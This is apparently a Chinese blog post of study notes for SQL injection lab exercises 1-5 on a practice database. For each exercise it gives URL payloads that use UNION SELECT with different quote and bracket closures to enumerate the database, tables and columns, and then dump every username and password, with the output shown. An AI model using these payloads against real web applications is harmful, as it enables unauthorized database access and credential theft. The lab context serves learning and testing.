2020.12.17 SQL注入

SQL注入1-5题

ELECT VERSION() -- mysql版本
SELECT USER() -- mysql数据库的用户名
SELECT DATABASE() -- 当前数据库

SELECT *,schema_name FROM schemata -- 当前用户拥有的所有的数据库的名字,schema_name
SELECT * FROM TABLES -- 当前用户拥有的所有数据库及其库下面的表的名字,table_schema,tablename
SELECT * FROM COLUMNS -- 当前用户拥有的所有数据库及其库下面的表的名字,及表下面的字段的名字

(1).获取所有账号密码 有引号

  1. 获取访问数据源列数
?id=1 order by 3 --+    //看是否访问出值,存在表示列数存在
sele user,pass from table where id='1' order by 3 --+ imint 0.1   //--+  将后面的imint进行一个注释 
  1. 获取账号和密码所在列
?id=' union select 1,2,3  --+     // '  强行闭合放空

  1. 获取所在的库库名(爆库)
?id=' union select 1,database(),3 --+   //获取到库名security
  1. 获取所在的库下的表名,并试着寻找最有可能的表(爆表)
?id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
    
    //Your Login name:emails,referers,uagents,users   找出来的表
  1. 获取表下面的列,查看是否正确
?id=' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

//Your Login name:id,username,password   拿到想要的结果,确定了表
  1. 获取所有密码和账号
?id=' union select 1,group_concat(username),group_concat(password) from users --+

Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

//拿到所需要的账号和密码

(2).获取所有账号密码 无引号

  1. 获取访问数据源列数
?id=1 order by 3 --+    //看是否访问出值,存在表示列数存在
sele user,pass from table where id='1' order by 3 --+ imint 0.1   
//--+  将后面的imint进行一个注释    因为id为数字型,没有单引号括着
  1. 获取账号和密码所在列
?id='' union select 1,2,3  --+
//数字型放空直接两个单引号
  1. 获取所在的库库名(爆库)
?id='' union select 1,database(),3 --+   //Your Login name:security 获取到库名security
  1. 获取所在的库下的表名,并试着寻找最有可能的表(爆表)
?id='' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
    
//Your Login name:emails,referers,uagents,users   找出来的表
  1. 获取表下面的列,查看是否正确
?id='' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

//Your Login name:id,username,password   拿到想要的结果,确定了表
  1. 获取所有密码和账号
?id='' union select 1,group_concat(username),group_concat(password) from users --+

Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

//拿到所需要的账号和密码

(3).获取所有账号密码 存在括号和单引号

  1. 获取访问数据源列数
?id=1 order by 3 --+    //看是否访问出值,存在表示列数存在  
//--+  将后面的imint进行一个注释    因为id为数字型,所以这里不需要存在闭合
  1. 获取账号和密码所在列
?id=') union select 1,2,3  --+
//数字型放空直接两个单引号
?id='') union select 1,2,3  --+ //可以运行但是无结果,因为括号单引号和外闭合
  1. 获取所在的库库名(爆库)
?id=') union select 1,database(),3 --+   //Your Login name:security 获取到库名security
  1. 获取所在的库下的表名,并试着寻找最有可能的表(爆表)
?id=') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
    
//Your Login name:emails,referers,uagents,users   找出来的表
  1. 获取表下面的列,查看是否正确
?id=') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

//Your Login name:id,username,password   拿到想要的结果,确定了表
  1. 获取所有密码和账号
?id=') union select 1,group_concat(username),group_concat(password) from users --+

Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

//拿到所需要的账号和密码

(4)获取所有账号密码 双引号与括号

  1. 获取访问数据源列数
?id=1") order by 3 --+    //看是否访问出值,存在表示列数存在  
//--+  将后面的imint进行一个注释    因为存在双引号和括号,需要对应才可以得到内容
  1. 获取账号和密码所在列
?id=") union select 1,2,3  --+
//数字型放空直接两个单引号
  1. 获取所在的库库名(爆库)
?id=") union select 1,database(),3 --+   //Your Login name:security 获取到库名security
  1. 获取所在的库下的表名,并试着寻找最有可能的表(爆表)
?id=") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
    
//Your Login name:emails,referers,uagents,users   找出来的表
  1. 获取表下面的列,查看是否正确
?id=") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

//Your Login name:id,username,password   拿到想要的结果,确定了表
  1. 获取所有密码和账号
?id=") union select 1,group_concat(username),group_concat(password) from users --+

Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

//拿到所需要的账号和密码

(5)获取所有账号密码

  1. 获取访问数据源列数
?id=1") order by 3 --+    //看是否访问出值,存在表示列数存在  
//--+  将后面的imint进行一个注释    因为存在双引号和括号,需要对应才可以得到内容
  1. 获取账号和密码所在列
?id=") union select 1,2,3  --+
//数字型放空直接两个单引号
  1. 获取所在的库库名(爆库)
?id=") union select 1,database(),3 --+   //Your Login name:security 获取到库名security
  1. 获取所在的库下的表名,并试着寻找最有可能的表(爆表)
?id=") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
    
//Your Login name:emails,referers,uagents,users   找出来的表
  1. 获取表下面的列,查看是否正确
?id=") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

//Your Login name:id,username,password   拿到想要的结果,确定了表
  1. 获取所有密码和账号
?id=") union select 1,group_concat(username),group_concat(password) from users --+

Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4

//拿到所需要的账号和密码
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值